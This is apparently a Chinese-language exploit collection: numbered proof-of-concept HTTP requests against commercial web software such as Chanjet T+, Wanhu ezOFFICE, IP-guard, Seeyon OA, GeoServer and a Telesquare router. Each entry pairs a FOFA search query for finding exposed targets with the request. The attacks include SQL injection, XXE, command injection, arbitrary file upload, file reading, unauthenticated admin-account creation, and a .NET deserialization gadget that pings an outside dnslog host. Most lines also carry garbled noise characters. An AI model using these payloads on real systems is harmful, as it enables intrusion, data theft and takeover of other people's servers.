9 X$ z3 ?: n2 ^, }% _, p1 R3 ~; y "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",5 M% R% a' M' T) y' |) K8 w
"MethodName":"Start",
5 F' w/ a4 i. i$ ? "ObjectInstance":{
! P2 D2 v" u# B! V "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% h" F. e: @" y; t1 H7 ~% f& n: b "StartInfo": {
4 V, q' c( g' D "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",& H8 L3 ?; a- S8 |+ }% p
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
5 t, f5 K a( \* L }2 H' T- F8 b5 u7 d
}* d. A* N0 I# p6 ^- g) |- |
} C) j% V1 q0 ?2 X& R5 v
}
& w k- j1 `2 v* [ F# j: c; z8 i/ z- [. b8 y ?6 G+ V
7 S. `( |; t; m6 O2 B
57. 畅捷通T+ keyEdit.aspx SQL注入9 b! ^1 d: G! R
FOFA:app="畅捷通-TPlus"
& w" }. t8 p7 |. J3 F' vGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1$ T- l- e0 R8 f; o
Host: host$ O: ?7 u4 n: z5 C( w! q8 E
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; X2 W* H" g* \% \. iAccept-Charset: utf-8
5 S/ u* D9 r' ?/ x3 X8 v# `3 T4 C9 `Accept-Encoding: gzip, deflate
6 L6 ]( x h4 vConnection: close- X+ d9 Z+ s0 D% E
6 p1 @% y- [. o- v& @! U2 h4 m
/ \+ }! f5 @! B/ A9 @3 J/ r58. 畅捷通T+ KeyInfoList.aspx sql注入
6 _' ~9 e, B' s) D% D2 ?" o! KFOFA:app="畅捷通-TPlus"; J5 ?( r: B% F e
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
& E3 X' ^; x% p& k0 kHost: your-ip3 e' t% B2 D' p8 {
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36+ U* X) l2 F& G6 s6 H* W* V% X
Accept-Charset: utf-8$ e- C& x9 @0 M3 I
Accept-Encoding: gzip, deflate
: Y" S6 z8 s7 G) U& rConnection: close5 |' h. N0 [1 o" \' w @1 o# m& H
! Q9 B8 m2 W6 Q: Y$ I5 Z! ]9 x" n) P! h- f! {
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行9 j& w% K1 o6 j4 U* y2 P; Z
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"0 d) K# N0 X' y# C5 }
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
/ V7 d/ ^2 g6 y- ?Host: 192.168.86.128:9090 }" M9 O; j, d/ H9 d' D q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" o) h! t- \5 M6 R" g. ~
Connection: close: J" A/ }' c4 f; s+ j
Content-Length: 1669
* @: g) a5 ~7 @. H7 B" ~Accept: */*
( S2 j7 F1 C; MAccept-Language: en) W6 @" v8 y- o) ?2 h. g# g4 Z8 E
Content-Type: application/x-www-form-urlencoded% M" y! f7 n8 Z
Accept-Encoding: gzip' V; H1 @* U; y; A. ^
4 j8 ~0 X) F, w7 SPAYLOAD
$ u. V' K5 l8 U& N: K: i* a% C
1 D) N# E$ s" [7 {7 }% B/ }: `. z7 Q! M; Z y9 v8 }/ k
60. 百卓Smart管理平台 importexport.php SQL注入
) }! t+ D q- r* \7 X) MFOFA:title="Smart管理平台"
$ j! l. B- o/ d+ x3 e, \2 u9 IGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
5 r- L# S- C/ l+ nHost:% @! N8 t. @5 B7 R9 K- f, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* ` ^0 f. ^3 v, F l2 o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 Q, O1 f4 t/ X# z5 i# d) D! s( qAccept-Encoding: gzip, deflate
8 U6 X* `) b& |& }% [$ gAccept-Language: zh-CN,zh;q=0.9! M" K& O/ V6 a9 R9 U3 m5 E
Connection: close
$ p3 c0 D: B5 V" L- a3 k& w% Z8 X+ _! [7 @5 i% @9 U3 X
1 ~2 t& j; \+ m$ }2 ~# X7 a
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 h/ v4 f8 u+ a- }; MFOFA: title="欢迎使用浙大恩特客户资源管理系统"
( P2 ?% J i/ bPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
2 R' ?( I- s1 q CHost: x.x.x.x; n# S5 z' Q, D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ j* U1 t+ y2 H' ^3 J
Connection: close
" l% S" Q6 G# \: oContent-Length: 27
( B n; @+ ~& O0 s7 Y. G" zAccept: */*
* `, @7 [( D. @: { ]% g4 ~2 iAccept-Encoding: gzip, deflate
( n! f. s# ]6 g& `Accept-Language: en* M+ C1 T' B8 p% S- _, k* U
Content-Type: application/x-www-form-urlencoded2 O; R5 r$ D e2 E! l! }. X0 ~. E
2 i6 ], e0 I v2 ^2 u, a8uxssX66eqrqtKObcVa0kid98xa
# U9 _: H2 p/ ~- p& m: @) H* P# A \& Q0 E8 @4 A) ` p* y0 a
( K. c. M V8 m
62. IP-guard WebServer 远程命令执行
7 z8 V/ l, a1 _9 ]" D G0 S% w6 RFOFA:"IP-guard" && icon_hash="2030860561"
+ w- z2 X9 i: t# ]( ~7 WGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.14 F* G7 ^+ h* {' d7 [+ ~1 ~7 A2 w
Host: x.x.x.x
8 }# r5 P) D! c8 W8 JUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
" `8 d6 W) F* k7 I# h) qConnection: close
, W J# D8 i ZAccept: */*6 V& [. o" d0 Z, ]0 ]2 C5 V
Accept-Language: en) N6 N( h @; U1 A K
Accept-Encoding: gzip
/ |8 |' D/ ?6 `/ e% P" Z$ p1 d( w7 b. Y6 A' _0 p
: `2 k5 _6 j2 l) P# G访问! V; Z7 l- n8 W; ~& o6 z t2 ?
$ W- y2 L% Y3 B9 L \- A* ~GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
/ J2 y6 `! f/ `! H: z! i7 G* qHost: x.x.x.x
4 S/ ^5 Y; j" R
4 {% j. x l% p6 o+ j8 U; h7 \2 n \& W" h$ ~( M. N) Z
63. IP-guard WebServer任意文件读取
% g/ G0 k2 p- M) A3 PIP-guard < 4.82.0609.0
: Z$ Q. f( h+ b5 p) `FOFA:icon_hash="2030860561"
2 q9 q8 D$ ^ l: d: O* s* K( C+ EPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
. R+ H i$ a# Q B. hHost: your-ip
9 V2 X$ [0 X( k9 w N' @3 p$ H& [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
( i8 X: f; X' E- g- r$ F- lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 r/ U9 J# d# y# F1 {5 c5 [
Accept-Encoding: gzip, deflate
: x! i Z' i: `3 g3 y2 QAccept-Language: zh-CN,zh;q=0.9
& T+ b1 g6 O. s- y& @Connection: close( e9 _6 P9 W3 K$ E; R0 D( l5 s
Content-Type: application/x-www-form-urlencoded T* l) ]2 G3 a5 a0 V# M& C1 k9 U4 [
1 K' k. J' N8 B- N
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
! P: e7 L% T) ~! u. Z( i1 e N5 y. `8 u* c" v# j2 P6 |
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
3 o# k! K5 F# S' \FOFA:body="/Scripts/EnjoyMsg.js"
+ k# s# z, Q8 c& n9 P$ B* lPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
& I6 S# d. f# d* @- v: gHost: 192.168.86.128:90011 ^, o' }' M3 k6 U! _+ F
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.367 r0 Y: n. y/ R' g0 y5 A' _
Connection: close. K( N7 }! X* }- {" D
Content-Length: 369
) N% I E9 S5 f2 pAccept: */*3 U7 \6 l# W) ]7 c
Accept-Language: en
T4 Y- a. k$ y9 g) P5 v% M6 Q! U3 pContent-Type: text/xml; charset=utf-8
/ q" |: J- T& L+ u5 Q. ~Accept-Encoding: gzip% \/ J0 @: y; h2 y' Y8 z" O
3 w% n& D" y! @' N( J<?xml version="1.0" encoding="utf-8"?>
: J. O/ s9 V0 c+ \# n8 E<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
: k3 U+ x, D2 T8 j( `" H+ p<soap:Body> I+ L$ w* b! p8 s! Y) U
<GetOSpById xmlns="http://tempuri.org/">
6 w! v7 W% C# `# ?- A8 ` G <sId>1';waitfor delay '0:0:5'--+</sId>
, T: U; t. E5 p8 U: ~" O. j </GetOSpById>0 X4 ]/ f( C+ b) Y
</soap:Body>
9 \0 m7 @8 @; {$ i</soap:Envelope>
" u% o2 [7 p3 Y. {! j
( ~9 b: q. c! g7 C6 B# G. G( A
. q/ Z( R; t1 E- a, ^# n3 f/ y8 ]% m65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ ^8 r. I7 T* i3 T. w
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"; {& V+ M$ i8 Z$ T' M
响应200即成功创建账号test123456/123456
6 [! G1 \% w! ~2 D* i6 K6 FPOST /SystemMng.ashx HTTP/1.1
! B2 }7 P* K3 w$ PHost:2 r2 ]) }6 s4 T( C$ S* _
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
( m3 l: ] t9 `; v$ PAccept-Encoding: gzip, deflate
8 s' d q) f. A0 k: D1 u1 XAccept: */*' @" J% |7 T3 I2 m8 C
Connection: close7 P) } Q# j' x& ]
Accept-Language: en: E% {4 H, |7 W+ M
Content-Length: 174
0 ^5 w: n- Z+ C: B# ~$ L; x7 Q' J( P5 u0 F$ \
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
- _- N0 E* n: X: P- X1 ]% z2 o) X
; }( Q* P& S; w5 }9 O( X: Z( ], Q _3 A! z1 L! h! ?# K1 w9 }
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
# Q8 v: J) s f) l+ v* ]FOFA:app="万户ezOFFICE协同管理平台"
" h; u8 A: C# g. u, i- p( Y5 I; F
3 k: W- d0 y* @8 YGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
% a6 h: s7 T+ i% m) L7 |, pHost: x.x.x.x
T# `( G! s# v1 t. P- G0 O: @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 {8 m4 G% @- oConnection: close- I# k+ ~; }* V$ I
Accept: */*+ ~1 t; w5 F; x! U/ M9 ]5 u
Accept-Language: en
) P. R% H' W' a, g# e& E& ?Accept-Encoding: gzip, P3 t" i% M& }8 M4 {
9 A2 H/ X+ O% y4 t. ]' a0 }$ S, a# n# P, A/ \5 M1 [7 S a7 {4 @
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
5 v1 D2 T- b# i$ w; Z: @
, l/ D( R3 V) @" ^7 ]* ]% u' A) p67. 万户ezOFFICE wpsservlet任意文件上传
/ @/ m. Y9 V, k" L* t5 S% z" g8 M$ |FOFA:app="万户网络-ezOFFICE"
" c ~$ z! G; ]# OnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
/ e3 m9 G& v6 W0 _# y% l( `POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1 m7 a( @, a* c ?2 @
Host: x.x.x.x
n3 v0 f6 `2 g, |. Q+ @9 q. S, ?User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
% O' D% U1 G6 Q% J9 j; a; ^Content-Length: 1730 b, ?: Q( {% O% g% ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
7 n; A: [0 I/ r. O2 CAccept-Encoding: gzip, deflate( w; T9 I4 M5 K( l; n! r
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3( b4 N+ q/ Q9 J' S: Z u
Connection: close3 z, y* |+ K2 z& h. k" K
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
+ V ?0 l5 b* l( ~3 N3 E6 dDNT: 15 O; U$ t" O& n+ o" P
Upgrade-Insecure-Requests: 1# r: V2 B O# z4 `6 k9 C/ w
0 J. x7 o7 b3 k' u2 H7 V& O' V
--ufuadpxathqvxfqnuyuqaozvseiueerp/ x9 e. M- [9 k) {. I' X
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
3 _" }) X. O# i3 P' Z+ E" B: o3 y) K' F4 x8 K! `! D! ?4 V
<% out.print("sasdfghjkj");%>5 ~; P/ D8 y- K* x/ \3 J
--ufuadpxathqvxfqnuyuqaozvseiueerp--
4 D/ N( c9 u4 m. o
: z: h2 K5 }' V; J
- ~+ P3 N7 g8 n0 k文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp; N0 x- H$ o7 P" X. |4 e2 D. Z( o
! f& t& f% c3 n* Z0 W6 X
68. 万户ezOFFICE wf_printnum.jsp SQL注入
4 E# h4 t/ R) h% w0 z4 ZFOFA:app="万户ezOFFICE协同管理平台"
" E- q7 v' t, A# I# K5 M4 e* DGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1$ T' E: Y5 t2 c- v: [2 z2 }( A( a
Host: {{host}}
. ]1 y* B* K8 }0 J" WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! `) C1 s* h* {5 u4 G( n, ]+ T
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.87 _. b& B6 A( j1 A3 R. a1 B F$ Y& \
Accept-Encoding: gzip, deflate1 m v& w4 H C& V' l# b, ]5 S
Accept-Language: zh-CN,zh;q=0.9. p! b6 ]5 i; H7 H( a' a
Connection: close. f& s9 ~! ~) p1 N
8 _$ w8 T3 N8 T; A, B0 y8 B2 C
8 E5 @5 K& |3 m( F, \
69. 万户 ezOFFICE contract_gd.jsp SQL注入% ?) @9 y# l# x$ y& m
FOFA:app="万户ezOFFICE协同管理平台"& i2 y: ~( u8 X( R7 |3 X! l0 l
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1" c, A- @. s. k+ m* D2 Y( c# E
Host: your-ip
7 O1 x5 h0 s" E! K7 G: O( z! C2 UUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
; q# m) v; B9 M7 x& O8 |Accept-Encoding: gzip, deflate7 ]- B7 Q v& v$ b0 ?/ s
Accept: */*
) R, ~3 M3 D% r% _Connection: keep-alive
! ^& x% [ }/ u# j# j* l q
& G7 u6 k/ y3 ~/ I
# `1 D O7 j x. J _& r6 f70. 万户ezEIP success 命令执行) o$ [/ t4 n; ?( m8 m
FOFA:app="万户网络-ezEIP"
! Q! i! Y6 t2 s: L: |% nPOST /member/success.aspx HTTP/1.10 j. ?! a2 A% ], e- I8 O, @+ `, m$ R
Host: {{Hostname}}
3 A( i7 b% d- N" KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
6 }1 r y' n4 [8 d! XSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=, V3 [# N, }4 Z8 d( n+ N1 @( J) _
Content-Type: application/x-www-form-urlencoded5 u! M9 ~. f8 f2 V9 w& H" Q, B
TYPE: C8 r. B6 b# O9 y& h& s) t
Content-Length: 167025 ]$ l- d3 \6 E* \* X2 V
4 V" _0 c' ^5 q0 z; Q8 Z" \5 P
__VIEWSTATE=PAYLOAD
) u7 @) t( o9 ]( ]& R
0 Y2 }- ]: f( d. K( r" p6 T+ Y9 } q8 t- @9 l4 ^ p
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
, }1 a& i; [' F7 U& r% K( YFOFA:body="PM2项目管理系统BS版增强工具.zip"+ m) d K1 p0 I1 ?* o
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
1 D" d8 o, A& x) J& M% AHost: x.x.x.xx.x.x.x' ]. T# \- U9 S( ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36$ G& J; I1 R1 G: ]
Connection: close
! `' _7 v# @9 ?6 E7 q" o0 BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; {2 P9 M1 w* Y. [+ R4 O+ ?Accept-Encoding: gzip, deflate
5 U a" O5 k$ h/ H; r0 g. I- z7 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# h8 c6 p1 k f: m4 B
Upgrade-Insecure-Requests: 15 m1 j3 P2 v' Q1 \, I* U5 ]% s5 a
& Z( f3 f( F% d* E+ x3 _! \( b- Y: ^! j7 s1 T9 X
72. 致远OA getAjaxDataServlet XXE! U7 {" M. ^6 R- S3 ?6 {
FOFA:app="致远互联-OA"
8 e' d- d- h. m$ ?; t# uPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
$ y' |8 q% q- X! X4 B# l7 b5 yHost: 192.168.40.131:8099
- r4 W- W3 C5 q* |) @" S& GUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
! D: \: a! a& |2 j! |( `Connection: close- O( L; T$ B- ^, @) X
Content-Length: 583
4 H) @/ ], m% P0 V& FContent-Type: application/x-www-form-urlencoded" K Q$ G; P: Q. v' O
Accept-Encoding: gzip* C7 ^4 l. X* M
1 z9 E# s, O$ l3 F* [
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E ?$ G% N7 x4 ~* @
2 D4 W7 f3 d% g3 f4 k M) r7 Z! s% K
73. GeoServer wms远程代码执行3 N: o E: e9 j& R9 N: r5 c
FOFA:icon_hash=”97540678”
w2 q' b' M4 P0 g9 `9 ~1 e# RPOST /geoserver/wms HTTP/1.1
' {# W7 K5 g- T$ `3 B4 OHost:- A& J0 N9 U& A/ t$ a5 i4 p# e' B2 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* C( r7 s+ G( I' @; v% I" N: q
Content-Length: 19812 X' }& H5 Z: T
Accept-Encoding: gzip, deflate
8 Y+ X, O) P. u6 sConnection: close9 e+ j5 ^$ b8 W/ b% x
Content-Type: application/xml7 q/ \- z9 Y' R, I
SL-CE-SUID: 30 _, G0 M7 T0 d7 Y" [% W: G( f
" U/ j( ?$ X5 \# V
PAYLOAD
( W# Z6 F' {5 e. k) ?( ], N8 w8 b( B1 Q* @
0 Z, m5 p3 C6 T- A$ C! u9 t8 ?74. 致远M3-server 6_1sp1 反序列化RCE
$ c; v" J+ R6 b" F: bFOFA:title="M3-Server"
4 @1 X$ f9 j% y, Q* B% pPAYLOAD
7 O, _+ O% ~- k: s+ d3 L+ W" K" f" m& ] U3 J8 x/ v% C% X) D
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, f( R! E/ F% O% X
FOFA:app="TELESQUARE-TLR-2005KSH"
) y6 Q: h/ r1 a& Y% R3 {GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.14 \* M) B, \* Y& t, V
Host: x.x.x.x
5 O0 m- P# R+ W) V% z7 X; h ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 [: C9 }# x& A Z" V8 s: wConnection: close* [; B* v( e9 I" D2 O
Accept: */*
0 w) j/ R- ~' s0 j5 |* I, G% @Accept-Language: en5 |# {* w$ K8 S& v' r o
Accept-Encoding: gzip& x& _- _! j7 _
# R! T! [( I; D; M1 H
) [( m" l8 E9 ~( E& o4 Y! FGET /cgi-bin/test28256.txt HTTP/1.1, |3 r$ ^" j$ ]
Host: x.x.x.x* t$ Z5 _( P/ N6 Q1 y8 _
3 j7 L9 u+ t* z3 R C" x0 T4 T
2 X2 l$ L: n" W- |76. 新开普掌上校园服务管理平台service.action远程命令执行
; v4 l9 ^# D: {, h! R" n+ F! i. lFOFA:title="掌上校园服务管理平台"
% F) C) H8 B0 }* |# mPOST /service_transport/service.action HTTP/1.1* |" B3 S" e, I/ Q( W+ E
Host: x.x.x.x
) m5 i3 N+ w# z1 c3 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ W6 Z, _& ^4 S/ M% h8 fConnection: close# }8 s5 W2 z% r5 k- S. Q
Content-Length: 211
4 g0 R8 \ _5 Y$ Q( s6 bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 }$ t, N8 h( Z0 n3 f# u3 DAccept-Encoding: gzip, deflate2 ^6 X( X* g( ?$ X9 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 ~5 V, X7 R' S4 T/ c: k: B/ }1 D0 y
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A49 T; u0 l% C. ~# e
Upgrade-Insecure-Requests: 1! n. {+ v% ^9 t) d, [/ _
, |' ~0 F& |, y8 L/ J! p{
- u( K/ x9 l' V2 F6 J"command": "GetFZinfo",
+ k3 x8 R3 s# u: z# K "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
% R/ F) S. g8 l( o/ ^ ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
# A, A% m( V t}. [ J6 M$ ~* Z, C. P5 p: t
" G$ W2 [% `: t2 u, p7 z
0 P7 C9 O8 g- J$ h! mGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
3 P5 D3 x, U' c% G7 b5 s4 vHost: x.x.x.x8 l8 R( y4 Z" N) g0 \1 p( x
* p) z$ d2 A& X' K
# v3 G8 C" a% {. F2 h- V+ ?! Y* Z1 H( @# x- }
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
3 m, X3 B8 x# O% [7 ~0 E7 E1 IFOFA:body="F22WEB登陆"; p; {9 F" w$ [' y2 \5 G/ S
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1* ` \, H% N9 j3 i7 O/ d/ n* c5 A
Host: x.x.x.x
1 B* ~( h9 H. {1 e8 r5 Y/ c( e3 B( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 F/ Z1 q& P6 X" ^6 oConnection: close
8 T: @! }( }! @0 j. K# O9 \Content-Length: 433
7 A& @3 ~$ F2 U1 @7 x: aAccept: */*
3 X) Q# r9 ~! e: S' DAccept-Encoding: gzip, deflate9 j& m c) |# c- r* |4 K
Accept-Language: zh-CN,zh;q=0.92 s+ ~/ x; q ^, p Q
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
( I. b7 Q" x0 b4 X' V5 y5 L3 E3 I1 N0 x8 E* E6 ^9 O! h3 E
------------398jnjVTTlDVXHlE7yYnfwBoix
! h2 V/ ?1 J: L5 J$ g+ K0 u+ F3 j9 a6 BContent-Disposition: form-data; name="folder", q8 u7 `6 i& v! C, }! M* w
3 M( o8 ?5 q3 j* f. Y+ O! j
/upload/udplog# B/ f; |& ^9 v& ~) L
------------398jnjVTTlDVXHlE7yYnfwBoix1 y1 s$ F% J# Q4 o7 i
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"- Q8 l4 N4 z9 z5 q7 D. L$ P
Content-Type: application/octet-stream5 {0 O' U- ~. r& k3 r
- W; K& R2 \: I* y: [+ a
hello1234567
, u( Z0 w R4 K# b+ n------------398jnjVTTlDVXHlE7yYnfwBoix# m' h: [2 B6 J
Content-Disposition: form-data; name="Upload"" T- Q% t) o7 u7 g
+ o* T6 ~4 K `% Q
Submit Query
* E0 Y- y5 A8 _6 a9 n- `6 }: C------------398jnjVTTlDVXHlE7yYnfwBoix--
3 D7 y% y2 U M
- r! E( R) R* u9 ?6 m* y9 C# O T* z k5 M0 y) {
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) q6 p# h$ m: f- M+ F2 l' F
FOFA:icon_hash="2001627082"0 w4 k: S0 k7 N/ W# T B [
POST /Platform/System/FileUpload.ashx HTTP/1.1
& G1 T! O9 f i* ~5 fHost: x.x.x.x8 ~8 g+ B N2 q# r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: M7 q! V: i- I$ g; {' fConnection: close3 Q4 _' T5 H5 i8 g6 Q
Content-Length: 3365 Z+ r2 Z# H `7 s5 |1 g0 K
Accept-Encoding: gzip
% O7 J, i, x8 A ~ d9 eContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l# P3 J$ @0 |8 `! L. f2 [
; ?7 S" M7 v7 Y7 l. J( g
------YsOxWxSvj1KyZow1PTsh98fdu6l
' i) D) p, `7 i# S e5 T tContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
! X% ]1 b4 L+ y3 S; z. h8 V$ t7 o. aContent-Type: image/png
7 \: K: {$ ?& d5 M3 X8 e) W5 d0 |6 a; ~+ x8 A
YsOxWxSvj1KyZow1PTsh98fdu6l+ E9 c& ~, S1 H
------YsOxWxSvj1KyZow1PTsh98fdu6l& d* I! V+ a7 }2 r; j1 M) R' [: ]
Content-Disposition: form-data; name="target"
